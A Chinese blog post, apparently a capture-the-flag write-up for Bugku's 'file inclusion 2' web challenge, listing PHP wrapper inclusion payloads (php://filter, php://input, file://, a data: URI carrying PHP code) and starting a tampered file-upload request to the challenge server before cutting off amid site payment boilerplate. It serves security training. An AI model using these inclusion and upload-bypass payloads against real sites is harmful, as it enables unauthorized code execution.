Bugku web——文件包含2

本文探讨了在Bugku平台上的一个文件包含漏洞案例。通过观察链接模式,尝试php文件包含并遇到阻碍。通过查看源码发现提示涉及文件上传。经过抓包和篡改文件名与内容,利用php的另一种表示方式绕过过滤,成功执行代码并找到flag位于txt文件中。
摘要由CSDN通过智能技术生成

打开链接,看到链接形式为file=hello.php,因此首先尝试php文件包含

php://filter/read=convert.base64-encode/resource/hello.php
报错

php://input
报错

file://var/www/hello.php
没有报错,但也没有输出

data: text/plain,<?php echo 123; ?>
报错

经过几次尝试发现上面的结果,走投无路看一看网页源码,发现提示:
在这里插入图片描述
访问upload.php页面
发现是文件上传
在这里插入图片描述
随便上传一个文件并抓包,对抓到的包进行修改:

POST http://123.206.31.85:49166/index.php?file=upload.php HTTP/1.1
Host: 123.206.31.85:49166
Connection: keep-alive
Content-Length: 6002
Cache-Control: max-age=0
Origin: http://123.206.31.85:49166
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRQQRAvPdjBb5q6tC
User-A
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值